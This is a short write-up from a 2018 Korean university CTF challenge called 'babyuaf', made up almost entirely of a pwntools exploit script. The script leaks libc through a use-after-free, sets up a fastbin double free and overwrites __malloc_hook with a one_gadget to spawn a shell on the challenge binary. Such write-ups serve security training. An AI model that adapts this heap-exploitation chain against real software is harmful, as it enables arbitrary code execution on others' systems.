2018 아주대 사이버보안학과 ctf - babyuaf



 

Mitigation

 

 

Exploit

from pwn import *
context.terminal = ["terminator", "-e"]

# Local target process plus the ELF handles used for symbol lookups.
target_path = './babyuaf'
p = process(target_path)
e = ELF(target_path)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Offsets resolved against the local libc; main_arana_offset is hard-coded
# (presumably the main_arena offset of that same libc build — verify with the
# libc actually in use, the value is build-specific).
free_hook_offset = libc.symbols['__free_hook']
main_arana_offset = 0x3c4b20
one_gadget = [0x45226, 0x4527a, 0xf0364, 0xf1207]  # ldd local libc

def add_info(name, age, comment):
    """Menu option 1: answer the name/age/comment prompts with the given values.

    Every field after the menu choice is sent with sendafter, i.e. without a
    trailing newline; *age* is converted with str() before it is sent.
    """
    p.sendlineafter('> ', "1")
    fields = (
        ('name : ', name),
        ('age : ', str(age)),
        ('comment : ', comment),
    )
    for prompt, payload in fields:
        p.sendafter(prompt, payload)
def delete_info(index):
    """Menu option 2: select the record at *index* (the binary's prompt says 0~4).

    Presumably frees that record; only the menu traffic is visible here.
    """
    steps = (('> ', "2"), ('(0~4) : ', str(index)))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)

def view_info(index):
    """Menu option 3: ask the binary to print the record at *index* (prompt says 0~4).

    The caller is expected to read the response from ``p`` afterwards.
    """
    steps = (('> ', "3"), ('(0~4) : ', str(index)))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)

def add_memo(size, memo):
    """Menu option 4: answer the size and memo prompts.

    Both answers go through sendafter (no trailing newline); *size* is
    converted with str(). Presumably the binary allocates *size* bytes for the memo.
    """
    size_text = str(size)
    p.sendlineafter('> ', "4")
    for prompt, payload in (('size : ', size_text), ('memo : ', memo)):
        p.sendafter(prompt, payload)

def delete_memo(index):
    """Menu option 5: select the memo at *index* (the binary's prompt says 0~4).

    Presumably frees that memo; only the menu traffic is visible here.
    """
    steps = (('> ', "5"), ('(0~4) : ', str(index)))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)

# Exploit sequence for the challenge binary. The challenge name ("babyuaf")
# and the delete -> re-add -> view order below suggest the record slot keeps
# its pointer after delete; the defensive fix is to null the slot pointer on
# free and refuse to print a freed entry.
#uaf
add_info("A"*0x18, "100", "B"*0x10) # unsorted bin chunk
add_memo(16, "C"*8)
delete_info(0)
add_info("D"*8, "200", "E"*8)
view_info(0)

#main_arena+88 leak
p.recvuntil('DDDDDDDD')
# str + str padding: this assumes Python-2 pwntools (recvuntil returns str);
# on Python 3 the bytes/str concatenation would raise TypeError.
leak = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00") # libc_leak
libc_leak = leak - 88 - main_arana_offset
free_hook = libc_leak + free_hook_offset
malloc_hook = libc_leak + libc.symbols['__malloc_hook']
one_shot = libc_leak + one_gadget[3]
log.info('main_arena+88 leak : {}'.format(hex(leak)))
log.info('libc_leak : {}'.format(hex(libc_leak)))
log.info('free_hook : {}'.format(hex(free_hook)))

# Using the DFG (author's abbreviation, presumably the double free) a value can
# be written to a chosen location.
add_memo(89, "a"*8) # 89 was chosen so the size field falls in the 0x7f range.
add_memo(89, "b"*8)

delete_info(0)
delete_memo(1)
delete_memo(2)
delete_memo(1)

# Using the DFG, create a fake chunk around malloc_hook-35 (0x7f).
add_memo(89, p64(malloc_hook-35))
add_memo(89, "c"*8)
add_memo(89, "d"*8)
add_memo(89, "e"*19+p64(one_shot)+p64(0)*20) # overwrites malloc_hook with the one_shot gadget!

#after > -> choose 1 -> malloc -> __malloc_hook(one_shot) -> shell!
p.interactive()

 

